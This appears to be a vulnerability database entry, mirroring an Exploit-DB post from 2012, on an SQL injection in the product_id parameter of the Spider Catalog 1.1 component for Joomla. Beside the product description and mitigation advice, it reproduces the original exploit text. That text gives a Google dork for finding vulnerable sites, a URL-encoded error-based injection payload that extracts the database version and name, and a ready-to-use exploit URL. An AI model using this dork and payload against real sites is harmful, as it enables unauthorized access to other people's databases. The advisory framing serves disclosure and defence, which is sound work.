Joomla com_spidercatalog SQL injection Vulnerability

vendor:

Spider Catalog for Joomla!

by:

Daniel Barragan 'D4NB4R'

8,8

CVSS

HIGH

SQL Injection

CWE

Product Name: Spider Catalog for Joomla!

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: YES

Related CWE: N/A

CPE: a:web-dorado:spider_catalog_for_joomla

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux(Arch)-Windows(7ultimate)

2012

Joomla com_spidercatalog SQL injection Vulnerability

Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page. The vulnerability is caused due to the improper sanitization of user-supplied input in the 'product_id' parameter of the 'index.php' script when handling a querystring.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to modify the intended SQL query. Additionally, parameterized queries should be used to prevent SQL injection attacks.

Source

Exploit-DB raw data:

 1               #########################################              1
 0               I'm D4NB4R member from Inj3ct0r Team                   1
  1               #########################################              0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

 #Exploit Title: Joomla com_spidercatalog SQL injection Vulnerability

 Dork: inurl:index.php?option=com_spidercatalog
 
 Date: [31-10-2012]
 
 Author: Daniel Barragan "D4NB4R"
 
 Twitter: @D4NB4R
 
 Vendor: http://www.web-dorado.com/

 Demo: http://www.web-dorado.com/products/joomla-catalog.html
 
 Version: 1.1 (last update on Sep 25, 2012)
 
 License: GPLv2 or later Commercial
 
 Tested on: [Linux(Arch)-Windows(7ultimate)]

 
 Descripcion: 

Spider Catalog for Joomla! is a convenient tool for organizing the products represented on your website into catalogs. Each product on the catalog is assigned with a relevant category, which makes it easier for the customers to search and identify the needed products within the catalog. It is possible to add an unlimited number of parameters for each of the categories in the catalog in order to allow a detailed representation of the product on the catalog. Moreover, each product on the catalog can be accompanied with an image. Customers are provided with the possibility of rating the products available on the catalog, as well as writing customer reviews that will appear under the catalog products. Spider Catalog provides you with a high level of customization concerning almost all the aspects of the catalog, ranging from background colors and text size inside the product cell to the number of products in the row and the number of customer reviews per catalog page.


 Vulnerable Parameter Name: 

                                  product_id

 Parameter Type: 

                                  Querystring 


 Attack Pattern:

                                  -{Valid id}%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1 



 Exploit Demo: 

    SQLi : SQL injection

           http://localhost/index.php?option=com_spidercatalog&product_id=-1%27%20or%201%3d1%2b%28select%201%20and%20row%281%2c1%29%3E%28select%20count%28*%29%2cconcat%28CONCAT%28version%28%29,0x3D,database%28%29,0x3D,0x3D,0x3D%29%2c1111%2cfloor%28rand%28%29*2%29%29x%20from%20%28select%201%20union%20select%202%29a%20group%20by%20x%20limit%201%29%29%2b%27&view=showproduct&page_num=1&back=1



  Greetz:  All Member Inj3ct0r  Team * m1nds group (www.m1nds.com)* pilot * aku * navi_terrible * dedalo * ksha
  * shine * devboot * r0073r * indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 Jago-dz * Kha&miX * T0xic
  * Ev!LsCr!pT_Dz * By Over-X *Saoucha * Cyber Sec * theblind74 * onurozkan * n2n * Meher Assel
  * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects
  * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * MR.SoOoFe
  * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te


_____________________________________________________
Daniel Barragan "D4NB4R" 2012